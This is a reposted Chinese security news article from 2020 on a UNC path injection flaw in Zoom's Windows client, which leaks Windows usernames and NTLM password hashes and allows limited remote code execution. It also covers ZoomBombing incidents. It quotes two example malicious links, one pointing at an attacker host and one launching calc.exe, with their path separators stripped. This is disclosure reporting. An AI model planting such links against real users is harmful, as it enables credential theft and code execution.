安基网 首页 资讯 安全报 查看内容

Windows漏洞致使Zoom泄漏网络凭据,甚至可远程运行代码

2020-4-2 14:37| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 安全研究人员发现,作为一款流行的音视频会议应用,Zoom的Windows客户端中存在一个高风险的安全问题,可被用于有限的远程代码执行操作,更糟糕的是,攻击者还可以利用该漏洞捕获并重放安全令牌,以访问网络资源。Hacker House(一家专门从事渗透测试和漏洞分析的网络安全公司)的安全研究人员Matthew H ...


安全研究人员发现,作为一款流行的音视频会议应用,Zoom的Windows客户端中存在一个高风险的安全问题,可被用于有限的远程代码执行操作,更糟糕的是,攻击者还可以利用该漏洞捕获并重放安全令牌,以访问网络资源。

Hacker House(一家专门从事渗透测试和漏洞分析的网络安全公司)的安全研究人员Matthew Hickey表示,Zoom Windows桌面客户端在应用程序处理统一资源标识符(URI)路径方面,容易受到高风险的通用命名约定(UNC)注入漏洞攻击。

Hickey介绍称,“Zoom 允许用户在聊天界面通过发送文本消息来互相交流,而网络攻击者则可以向聊天界面注入 attacker.computer.com company_salary.xlsx之类的链接,如果任何人点击了该链接,就会暴露其Windows用户名、域名或计算机名以及其Windows密码哈希值。随后,攻击者便可以重放这些密码哈希值,并访问诸如Microsoft Exchange、Outlook Webmail以及Sharepoint之类的服务。”

随后,Hickey 还测试了来自另一名研究人员的发现,这一化名为“_g0dmode”的研究人员指出,使用该漏洞还能够捕获Windows网络NT Lan Manager(NTLM)哈希值。

这一发现丰富了研究人员之前对该漏洞能力的认知,Hickey表示,通过该漏洞,攻击者甚至可以在客户端运行命令和安装恶意软件。

幸运的一点是,如果攻击者尝试该操作的话,新版本的Windows将会警告用户“可能正在运行远程执行代码攻击”。

例如,可以通过发送以下链接来触发运行内置计算器应用程序的经典Windows远程代码执行证明:

127.0.0.1C$WindowsSystem32Calc.exe

但是,仅显示可执行文件和命令的警报对话框。

Hickey进一步补充道,“如果攻击者试图泄露证书,则不会显示任何警报。”

随后,Hickey展示了凭据捕获界面。

Hickey表示,该漏洞仅影响Zoom的Windows客户端。在Apple的macOS上,Zoom客户端是不会允许该链接生效的。

尽管新版本的Windows会在攻击者尝试远程运行代码时发出警告,但Hickey仍然坚持认为该漏洞应被视为“高危”漏洞。他说,“通常情况下,我会把它视为中危漏洞,但是鉴于该问题很容易通过‘ZoomBombing’(通过暴力破解猜测会议ID)来实现,而且更容易在家庭环境中得到利用,所以我建议将其列为高危漏洞。即使企业和企业网络通常会过滤用于利用该问题的出站端口,但在家办公的那些端口却不会受到相同等级的保护,大多数在家办公的用户根本不会像在公司办公一样,受到严格的出站网络使用的限制,因此可以认为这是一个上升级的风险。”

Hickey解释称,尽管有一些Internet提供商会过滤Windows端口以防止恶意软件传播,但还是不免有例外存在,而且大多数家庭宽带和Internet访问将允许对利用UNC相关漏洞所需的端口进行出站访问。

据悉,Hickey已经通过Twitter将该安全问题报告给了Zoom官方,目前尚不清楚该公司将采取怎样的响应措施。

随着疫情不断蔓延,如今,越来越多的上班族和学生开始在家中办公和学习,而此次Zoom爆发的安全漏洞势必会引发更大关注,并且面临更为严格的安全审查。

其他研究人员还发现,Zoom的“公司目录”功能会泄漏电子邮件地址和照片,并且视频会议应用程序未使用端到端加密来确保呼叫免遭拦截。

此外,美国联邦调查局波士顿办事处还发布了有关ZoomBombing攻击频发的警报,在这些攻击活动中,恶意行为者可以劫持视频会议,在某些情况下还会发布一些色情和/或仇恨图片以及威胁性对话来打断视频会议。例如,2020年3月下旬,总部位于马萨诸塞州的一所中学报告称,当一名教师使用电话会议软件Zoom进行在线授课时,一名不明身份的人进入了课堂,并大声猥亵这名老师,然后在教学过程中高喊老师的家庭住址。

关于此次事件,Zoom方面暂未发表任何评论。我们也将跟踪报道此事的后续发展,敬请关注。

原文链接:https://www.anquanke.com/post/id/202310



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/i6810707507665699335/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人
1

路过

鸡蛋

刚表态过的朋友 (1 人)

相关阅读

最新评论

 最新
返回顶部